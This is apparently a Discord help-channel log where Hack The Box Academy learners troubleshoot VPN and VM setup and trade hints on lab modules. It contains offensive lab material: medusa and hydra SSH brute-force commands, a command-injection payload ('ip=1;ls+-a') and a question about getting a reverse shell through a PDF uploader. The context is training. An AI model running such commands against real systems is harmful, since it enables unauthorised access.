Same, it allows us to fuzz at normal rate and has some auto scanning functionality

but i cannot fuzz the last character and decode the whole cookie at the same time

It can, use payload processors

Are you on the WSUS server or the other host?

srv01 😁

You're gonna wanna get on WSUS.

ohh okay, thanks!

I am

Hello

Is anybody online?

Hello

@modern siren please read #rules and #welcome

It doesn't allow me to enter general chat though

Follow the information in welcome

can i get a hint?

im adding a # to the end of the cookie to then fuzz it, but then i can't add another fuzz to enconde the whole cookie including that # that im already fuzzing

Sounds like you are doing the modules in wrong order?

can i get a hint?

sure dm

anyone for #modules message tried many things in the signup form but to me it is not possible. Also as a second-order not working

btw your process is flawed, rethink your approach as everything need to be encoded

my mind is broken guys i studied 12h today all about web hacking

Applications of AI in InfoSec => Model Evaluation (Spam Detection) => model submission (workspace VM doesn't have the required service started to submit a model...anyone else have this issue?)

Hey I need some help I am new to Linux and was trying to open the VPN file provided in the academy but openvpn keeps giving error in the terminal .
I am using ubuntu on a VM

What's the error?

(screenshot?)

Give me a minute I will share the image

sudo openvpn <path to vpn file>
example: sudo openvpn username.ovpn

Yup did that

Numerous time

@outer stone

Just cd into Downloads and take off Downloads in the command using only the file

Same error as the second

openvpn --version

https://forums.openvpn.net/viewtopic.php?t=31516

after this you can try
sudo openvpn --config <filename> --daemon &>/dev/null
It always works for me and others who had the similar issues with openvpn

and then you'll never see any errors...

get it working?

Ok let me try and get back

Also I am doing the linux fundamentals module and any other resource you would recommend for starting with linux

If any suggestions

@outer stone

update it if possible, I think that's the issue (the openvpn profile downloaded is using options your client for openvpn doesn't support or doesn't have enabled)..?

100% - complete this: https://overthewire.org/wargames/bandit/

Hello I have a question
Am I able to download ParrotOs onto my windows laptop? Currently reading over “Setting up” within the Information Security Foundations module

https://www.parrotsec.org/download/ yup

Thank you!

Has anyone completed poc and patching - null safety? I'm stuck trying to enumerate the admin id. I've only seen the user id returned in two places but can't see how to exploit them

what module is that under..?

Parameter logic bugs

@sour plaza Please make sure not to reveal content from modules above tier 0

You can download the iso or prebaked vm, but it's an OS, you can't just "run it" in windows.

Gotcha so gotta do it via virtual box to run it through a vm on my windows laptop

Or via wsl (windows subsystem for linux) which there's also a guide for but wsl is very shaky with networking issues

I saw that too! But did see there’s some cons going that route

Or via vmware, which is just another hypervisor

Gotcha! I’ll def do that when I get home from work today

No I'm not. An example is the local privilege escalation lessons. I'm just going through them in the order in which I've unlocked them. The most recent one I did taught a bunch of different methods for finding ways to escalate privileges, "Environment Enumeration" the task is: Enumerate the Linux environment and look for files that might contain sensitive data. Submit the flag as the answer.

The problem is you don't actually use any of the methods listed in the current lesson to find the flag.

I have the same issue and can't solve to be honest

Hi, just getting started in the Academy. On the Fundamentals Module. VMs. Downloaded and imported the WinDev2704Eval VM from the link in the module. However, when I boot it up it goes straight to a Blue Screen of Death! I've downloaded it twice in case it got corrupted but to no avail! Can anyone help!?

Download VMWare Workstation Pro for personal use it is free for personal use install Kali ISO on it and enjoy life

I've managed to install, Proxmox, Parrot and the full install ISO of Kali too. Just wanted get 'em all on!

What's VMWare Workstation Pro like to use, then? Compared to VirtualBox?

I don't know how to use de virtual machine on the Htb platform

It's have a VPN but I don't really know how to use it

The question at the bottom I couldn't answer those

https://academy.hackthebox.com/module/57/section/491
Login Brute Forcing Module
'Medusa - Web Services' section.

Using the same command given in the section:
medusa -h <IP> -n <PORT> -u sshuser -P 2023-200_most_used_passwords.txt -M ssh -v 5 -t 1

I get this output:

ERROR: ssh.mod: Failed establishing SSH session (1/4): Host: 94.237.59.174 User: sshuser Pass: 123456
ERROR: [ssh.mod] Failed to exchange encryption keys. Are you sure this is a SSHv2 server?
NOTICE: [ssh] Host: 94.237.59.174 - Login thread (0) prematurely ended. The current number of parallel login threads may exceed what this service can reasonably handle. The total number of threads for this host will be decreased.
NOTICE: [ssh] Host: 94.237.59.174 User: sshuser Password: 123456 - The noted credentials have been added to the end of the queue for testing.
ERROR: ssh.mod: Failed establishing SSH session. The following credentials have been added to the missed queue for later testing: Host: 94.237.59.174 User: sshuser Pass: 123456
ERROR: ssh.mod: Failed establishing SSH session (1/4): Host: 94.237.59.174 User: sshuser Pass: 123456
ERROR: [ssh.mod] Failed to exchange encryption keys. Are you sure this is a SSHv2 server?
NOTICE: [ssh] Host: 94.237.59.174 - Login thread (0) prematurely ended. The current number of parallel login threads may exceed what this service can reasonably handle. The total number of threads for this host will be decreased.
NOTICE: [ssh] Host: 94.237.59.174 User: sshuser Password: 123456 - The noted credentials have been added to the end of the queue for testing.
ERROR: ssh.mod: Failed establishing SSH session. The following credentials have been added to the missed queue for later testing: Host: 94.237.59.174 User: sshuser Pass: 123456```

I changed `-t 3` to `-t 1`  and have restarted my instance.
When I `nc IP PORT`, I get the SSH banner:
`SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.10`

And hydra does it fine with this:
hydra -l sshuser -P 2023-200_most_used_passwords.txt -f -V ssh://94.237.59.174 -s PORT

The IP address 94.237.59.174 appears to be a Docker container. You probably also got a port. Only this one port is usable for you.

What if you just tried: medusa -h <IP> -n <PORT> -u sshuser -P 2023-200_most_used_passwords.txt -M ssh

The only port I've been using is the one I was given

I just didn't include it in my message because I wasn't sure if I was meant to share it publicly

Just tried and get the same error messages

You don't need to use them all. You need to use either Kali or Parrot not all of them. You have to download VPN file open it and connect this way to HTB.

You can DM if you'd like.

Thanks 🙂

Was this in response to my statement?

yes

Can anyone assist me with the detecting windows attacks with splunk skills assessment? I am stuck on the print nightmare and bloodhound question. Can anyone point me towards the correct direction? I’ve tried using the zero logon splunk searches but nothing comes up

Any idea's for troubleshooting?

Throughout this module, I have had this problem whenever I attempt to use a TGS to the specified resource.

Defensive modules are the most reading and confusing.

I just sent you a DM about it

Can someone teach me what are SQL injections ?

https://academy.hackthebox.com/module/details/33

I don't click links btw

lol

That's the module that will teach you. This channel is specifically for the modules on Academy. If you aren't on HTB then I'm not sure how you found this discord, but this discord server is for HTB related things.

Just google "sql injection htb academy" if you don't want to click links lol

Well what's so lol about it ?

We all know how unsafe links are these days,....

I found this on a discord advertisement

Better approach, thank you

So you clicked a link to join then?

708/1480 MB (256 MB allocatable)
Increase the amount of RAM your VM has

Refrain from posting content from modules over Tier 0, especially content that contains sensitive information i.e., hashes.

ok got it

@quasi wave Please remember you're asking for help from people who have completed these modules. There is no need to post info spoiling content above tier 0. Just articulate your problem and maybe provide the error or something. You have been asked a lot to stop.

wake up babe, new academy module just dropped 🔥

You ask about SQL injection inside a Hack The Box discord. Someone responds with the proper Hack The Box module in the academy, and you refuse to click it? You're going to have a hard time in this industry 😬

sorry I am working on it I have compulsion problems with stuff like that but I am working on it

hi I am on the last question of the skills assessment section of pivoting tunneling and port forwarding module. The way to get credentials from the machine that worked on the second pivot in order to get into third pivot does not work when trying to use the third pivot to get into the fourth pivot. Obviously, I am still trying credential hunting and I managed to get the third pivot. I also cannot enumerate the fourth subnet where the DC is using nmap. I tried LOLing it. Anyone know what to do in order to get the fourth pivot in order to get into the DC?

I don't want to post specific commands because I'm 99% certain I'll end up spoiling it

I need credentials for the other user so I can log into their folder

right now I am RDPd into third pivot box

you can describe the steps. if you fear you'l spoil it. you can DM me

Yey, someone Complete credenciales hunting in shares ( password attack) im stacked and I really apreciate a hint

Be specific in your questions. did you stuck on the assessment? or something else

Im stucked in the Section, I Do rdp, and i use Both programs in Windows server ( snaffler.exe With the recomended paramaters, but its imposible to read) and PowerHuntShares that give me and error

hey, did you use nxc --spider ?

ey, i use it with mendres credentials and i give other erros

mmm strange

if you want dm me

you got something with netexec --spider?

wanna see tht nxc error

im doing again the netexec comand, the moment i recieve the error i say you

Im also doing the same task right now, and I get that error. Been stuck on it for 4 hours now and it's a bit weird...

i just resolve first question, feel fre to dm

o dm @stuck hollow, he help me without saying me the response directly

glad can help you

Great! Thank for the help @stuck hollow

Did you look into the availabile shares?

No I will look tomorrow tho

ended up doing a module skills assement and got root the not intended way

anyways i found a file showing me how to do it the legit way and it included imgur links lol i think this is more written for htb staff? not sure

but cool find. im glad i found it bc i had root but i couldnt figure out the normal method of attack

it even links to an imgur with the actual flag for the machine, which i didnt find before

Generally there's not many unintended methods but reach out to support or post in #1234357888114364508 or submit /feedback to actually bring the issue to the team. Otherwise it's going to get buried in the chat

why the first question in the new Credential Hunting in Network Shares module it auto response i don;t remember that i slove it before

Likely a renamed section so it automatically filled bc db shenanigans

lol i don't remember how i solve it

i am trying the hole day ...

it's likely the actual answer isn't what's autofilled in

i think so

i will check

so better i start with the first question ?

yeah

I'm doing the Attacking WPA/WPA2 Wi-Fi Networks module and am stuck at the last question of the section Enterprise Evil-Twin Attack.
I have the username (q1) and password(q2) and all I need for q3 is: " Connect to the HTB-Corp WiFi network using the obtained credentials. What is the value of the flag at 192.168.1.1? "
I've tried every security setting with the found username and password, but for the life of me can't connect to the htb-corp wifi. Any hints?

guys i am just starting out and am on the setting up module
im trying to install the vm manager and promox but when selecting the install promox ve (graphical) option in the promox vm
i just get a black screen on that window and nothing has happened now for the past 10 mins
any help?

you don't have to install proxmox

Hi there, anyone have any idea how a web PDF uploader can get me a reverse shell. Have tried using double extensions, %00 to escape, and that msf module to embed reverse shell into pdf. Still no luck, target is running on win64 apache web server

what academy module is this for?

Sounds familiar~ Is this for a box?

oh no, not a module, just wanted to know what else I could look into

bouta pull my hair out ughhh

doesnt seem to process wtv PHP crap i placed in the file too zzzz

If it's not for a module this ain't the channel for it,

If it's for a box, #boxes
and if you don't have access~ follow #welcome instructions

well if it's not for an academy module read and follow #welcome to gain access to #web as i believe that's the most applicable channel. Unless it's for a box then #boxes

this channel is specifically about help with academy modules.

alrighty, thanks

https://tenor.com/view/spider-man-we-one-gif-18212100

Proxmox is not meant to be installed as a VM, it was a very long time ago that I went through that module, do they talk about Proxmox now? Set up virtualbox or VMware workstation since it's free now

yeah they changed the module around

updated for newer versions of stuff

Hi
I'm stuck in Suricata section in Working with IPS/IDS module

How can I solve this problem?

Enable the http-log output in suricata.yaml and run Suricata against /home/htb-student/pcaps/suspicious.pcap. Enter the requested PHP page as your answer. Answer format: _.php

Hello!

this isn't #general read and follow #welcome instructions to access more of the server

I am in Using Web Proxies - Burp Intruder. For the question, it asks to use Intruder to fuzz for .html files under the /admin directory. I was able to find the file using gobuster, but in intruder, it passed over the exact file with 404. I took the request to Repeater and added the right extension and it worked there. Not sure why it did 404 in the Intruder.
I am using Community Edition of Burp and it is running on my own Kali VM.

have you examined the full response it gives for the 404?

How to fetch data of htb Api

Well building a web there user can see our team rank and members and points etc. Thats why I need an Api to do it automatically

there's documentation the community has put together online

Can u share that document link

lmao, it is always right when you are ready to give up that if you give it one more try you will get a break through

you can probably google and find it; 'postman htb api'

Yeah I did it but I don't understand the document it needs authorization bearer key to fetch api so where I can find it

doesn't the docs explain that?

either way, not a convo for this channel, read #welcome to find/gain access to more of the server

Make sure you had url encoding off

am I doing anything wrong in "Information Gathering - Web Edition: section-Virtual Hosts" module, heres the ques: Brute-force vhosts on the target system. What is the full subdomain that is prefixed with "web"? Answer using the full domain, e.g. "x.inlanefreight.htb"
please someone help

--append-domain but what's the domain? it doesn't automagically know that 😉

it worked thankyou so much

Hi
I'm stuck in Suricata section in Working with IPS/IDS module

How can I solve this problem?

Enable the http-log output in suricata.yaml and run Suricata against /home/htb-student/pcaps/suspicious.pcap. Enter the requested PHP page as your answer. Answer format: _.php

It is literally in plaintext in packet capture, just think what protocol would most likely be used in which we would realistically provide credit card info? and answer is in same format. in which credit card number is found.

It is "xxxx xxxx xxxx xxxx", I think it is pretty clear from packet capture? (Dont include the quotes)

In attacking common application module, osticket section, isn't question worded a little wrong? "Find your way into the osTicket instance", when we just need to login using creds provided in section walkthrough? It is not mentioned anywhere that is the case.

im unable to find out the zap HUD in the browser

as a tip @onyx stag please include the module and section name; not the /module/NN/section/NNNN endpoint, unless someone was just on that page it takes a bit longer for people to figure out what you're talking about

i mean it's not showing as in the module

check if the last icon is enabled like this.

i cant rdp to my machine , can anybody help ?

yes

even if i turn it on the HUD is not showing in the inbuilt browser

anyone ?

did you visit some url or are you on default page?

I'm using the pawnbox too

I've visited the given url

selected maual scan

then pasted the url with HUD option on then launched the browser

reproducing these steps give me HUD on my kali machine.

why doesn't mine give me the zap HUD 😭😭😭

I've been using burp as an alternative

dm and share screenshot

okay

ZAP hud isn't really required

Hey, anyone here done the tier 3 HTTP Attacks module? I am stuck on the HTTP Response Splitting exercise. I can get it working via my browser, but when I submit it to the admin, it just fails with no obvious reason why. Not sure if I am missing something but any nudges or assistance would be appreciated

I CANT RDP INTO MY MACHINE CAN SOMEONE HELP ?

i am using opevpn windows client to connect to vpn

and normal rdp service to join target machine but still its not happeing

What Do you mean With " autoresponve"?, only curious

Hi

I want a suggestion

I just know the basics of computer..want to start hacking...from where should I start..like a roadway..

this isn't #general ; read and follow #welcome to access more of the server

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

if you want some general starting pointers ^

I mean what to learn

it's a wide field my guy; that's why i pointed to the basic starting guide

yea I've figured

need help with the section repeating request

mind if i dm @fathom pendant ?

no dm

okay

where do i get my technical issues solved ?

@rain birch don't dm people without asking

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

@nova berry ^

need help with section repeating requests guys

how to navigate through that ip=1;ls+-a?

@fathom pendant sorry, I was just trying to get help,

@fathom pendant can i dm you, its for a question, not about the modules

you can ask here. also you can utilize discord's search feature to see if other people asked the same question 😉

what is it about?

LinkedIn I Think

@fathom pendant I used the search engine within the module and saw that those people had had the same problem and I didn't find the solution, so I asked them. I'm sorry if I bothered anyone at any time and I apologize.

genuinely can't help there

i doubt they didn't find the solution

but i'll tell you the answer to your question is: read carefully

If it's really worth it when you finish a course at the academy, upload it on LinkedIn., that's the question, maybe its a stupid one.

Se leer no soy estupido, tu respuesta suena arrogante

You could just drop your question w/module here so others can see and help out..

solo ingles, sabo que se dice. lee #rules

also it wasn't arrogance; the answer to your question is in the section reading. They give you Bob's password

marcialee, you know?

I need a hint for Q2 of the skill assessment for the crackmapexec module.
I found the ||sqldev ||cred in the shared folder, but I'm stuck after that. I can't access interns or elevate privileges.
Thank you.

put your question here

that's completely up to you

okay, thanks you

i check the shares manual and i find a "password" i just trying to test the tool

@lime cosmos the output still contained info 😉

ls /home/kali/.manspider/loot => empty

i meant that the copy/paste wasn't redacted enough lol

aaa, so you found the .txt

but, in my opinion, you can found the second question searching manually, but you need to look a lot of .txt

yes i already find it

manually i just want test the tools now

you found the both password manually?lol

hey im doing the password cracking module i been stuck trying to answer the question "What are the credentials to access the Edge-Router?" for 2 days now in the hunting windows credentials section. I would appreciate any hints or help, i have already tried using findstr to look for relevent files but no results.

hello, you can find it manually

wdym

search well

i believe it can be found by looking around the desktop for things

yes

need help with section repeating requests guys : how to navigate through that ip=1;ls+-a?

i have looked in the workstuff folder it only got 2 creds none of them worked

search well

its the only think i can say

they are very explicit in telling you it's for the router iirc

Sigh. I just managed to solve a problem i encountered. i spent hours on some issue. skill issue as usual

wdym "how to navigate?"

does that request give you a response?

yes it does

you can't "navigate" with RCE; i.e. you can't change the directory

but you can run other commands

like cat or things like that

flag.txt(previous answer )
index.html
node_modules
package-lock.json
public
server.js

is the output

it asks for the flag in this section

well ls looks in the current directory by default

but you can tell it to look at other directories

i.e. if you run ls / from any directory, it will always show the filesystem root list

i might be blind or smt but there is nothin in desktop router related

not even the work folder?

omg im so stupid spent 2 days trying to find the creds within the C folder, when the answer is literally in front of me 😭

except flag.txt there are new directories

maybe work backwards

cd ..?

no

remember you can't cd with rce

ohh yess

i already gave you a hint about how ls works

ls ?

if you ls ../ you ls the previous directory

ls ..?

ls ../ <- previous
ls / <- filesystem root
ls <- current directory

like how you cd ../ to go back a directory

or cd /full/directory/path to cd to a specific directory

ls takes a path as an input

so you can list stuff in other directories

ive tried backwards but only showing one directory named html with no extension and used again showing some directories and used again the root directory is opened .

this is definitely something new for me thanks

keep going backwards 😉

After root directory it keeps on repeating again 🫠

are you sure the file is the same 😉

cat also allows you to specify reading a file with the full filepath

i.e. no matter where you are in the system you can always cat /etc/hosts

yes 😭

did you try to read it? or did you do cat <filename> without changing anything specific